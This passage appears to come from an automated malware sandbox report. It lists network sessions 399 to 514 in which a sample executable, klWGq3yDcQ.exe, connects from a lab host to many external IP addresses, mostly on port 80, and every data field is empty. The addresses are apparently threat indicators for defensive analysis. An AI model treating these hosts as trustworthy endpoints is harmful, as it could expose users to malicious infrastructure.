                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    399192.168.2.462837185.135.132.105806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    400192.168.2.46284535.164.64.246806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    401192.168.2.46294034.136.104.255806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    402192.168.2.46307323.185.0.1806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    403192.168.2.46311415.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    404192.168.2.46292974.220.219.189806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    405192.168.2.46291695.168.220.210806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    406192.168.2.46294189.31.143.1806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    407192.168.2.462982199.34.228.177806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    408192.168.2.46315554.83.33.36806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    409192.168.2.46296834.208.26.152806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    410192.168.2.462926133.130.97.143806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    411192.168.2.46283513.234.155.54806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    412192.168.2.4629013.111.240.6806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    413192.168.2.462900148.66.138.193806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    414192.168.2.462903117.20.63.148806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    415192.168.2.46348415.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    416192.168.2.46348315.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    417192.168.2.46348815.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    418192.168.2.46348968.168.209.252806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    419192.168.2.46341191.195.240.34806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    420192.168.2.46347766.235.200.147806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    421192.168.2.46355915.235.14.141806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    422192.168.2.46347315.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    423192.168.2.4634723.94.41.167806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    424192.168.2.46358066.235.200.147806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    425192.168.2.46353066.81.203.8806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    426192.168.2.463729185.230.63.186806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    427192.168.2.46358223.185.0.1806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    428192.168.2.46359115.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    429192.168.2.463592185.230.63.186806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    430192.168.2.463528192.96.211.44806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    431192.168.2.46350713.32.208.27806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    432192.168.2.46358181.169.145.74806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    433192.168.2.46389552.206.191.232806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    434192.168.2.463893159.203.32.4806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    435192.168.2.46389472.167.58.161806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    436192.168.2.463896213.0.13.44806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    437192.168.2.463922104.200.30.31806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    438192.168.2.463965185.230.63.171806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    439192.168.2.463912117.20.63.14820306240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    440192.168.2.46415015.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    441192.168.2.46415172.167.58.161806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    442192.168.2.464194103.224.212.226806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    443192.168.2.4642743.94.41.167806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    444192.168.2.46430313.32.208.27806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    445192.168.2.46423866.81.203.8806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    446192.168.2.464327192.96.211.44806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    447192.168.2.464310144.202.62.131806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    448192.168.2.464285104.26.12.245806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    449192.168.2.46421989.31.143.1806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    450192.168.2.46437515.235.14.141806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    451192.168.2.46423974.220.219.189806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    452192.168.2.464281185.54.192.125806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    453192.168.2.464272185.135.132.105806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    454192.168.2.46428434.208.26.152806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    455192.168.2.46429881.19.159.64806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    456192.168.2.46440415.236.29.106806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    457192.168.2.464408185.135.132.105806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    458192.168.2.46440535.164.64.246806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    459192.168.2.46440699.81.150.60806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    460192.168.2.464328139.162.169.45806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    461192.168.2.46460999.81.150.60806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    462192.168.2.46507876.223.26.96806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    463192.168.2.465071172.67.132.45806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    464192.168.2.46507015.236.29.106806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    465192.168.2.465121192.96.211.44806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    466192.168.2.46507374.220.219.189806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    467192.168.2.46507595.168.220.210806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    468192.168.2.46509178.128.62.138806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    469192.168.2.46520754.83.33.36806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    470192.168.2.465198185.230.63.107806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    471192.168.2.46542147.246.24.211806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    472192.168.2.465468185.230.63.186806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    473192.168.2.465477104.200.30.31806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    474192.168.2.4491613.94.41.167806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    475192.168.2.44916252.206.191.232806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    476192.168.2.449205159.203.32.4806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    477192.168.2.449238185.230.63.171806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    478192.168.2.46546534.208.26.152806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    479192.168.2.449181103.224.212.226806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    480192.168.2.465502194.47.252.115806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    481192.168.2.44933623.185.0.1806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    482192.168.2.44952013.32.208.27806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    483192.168.2.44968052.206.191.232806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    484192.168.2.44958734.208.26.152806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    485192.168.2.449656199.34.228.177806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    486192.168.2.449661199.34.228.177806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    487192.168.2.44985776.223.26.96806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    488192.168.2.449830172.67.132.45806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    489192.168.2.44976192.62.143.50806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    490192.168.2.4500163.94.41.167806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    491192.168.2.449973162.241.62.220806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    492192.168.2.44982981.19.159.64806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    493192.168.2.45001772.167.58.161806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    494192.168.2.45014513.32.208.27806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    495192.168.2.45031215.235.14.141806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    496192.168.2.450144202.226.37.158806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    497192.168.2.450472185.135.132.105806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    498192.168.2.450663103.224.212.226806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    499192.168.2.450721185.230.63.107806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    500192.168.2.450815185.230.63.186806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    501192.168.2.45082023.185.0.1806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    502192.168.2.4509223.94.41.167806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    503192.168.2.45080166.235.200.147806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    504192.168.2.450929172.67.132.45806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    505192.168.2.450817185.54.192.125806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    506192.168.2.451006185.230.63.171806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    507192.168.2.45082499.81.150.60806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    508192.168.2.451019213.0.13.44806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    509192.168.2.451025139.162.169.45806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    510192.168.2.451083159.203.32.4806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    511192.168.2.45110176.223.26.96806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    512192.168.2.45110352.206.191.232806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    513192.168.2.45110499.81.150.60806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    514192.168.2.45111415.236.29.106806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


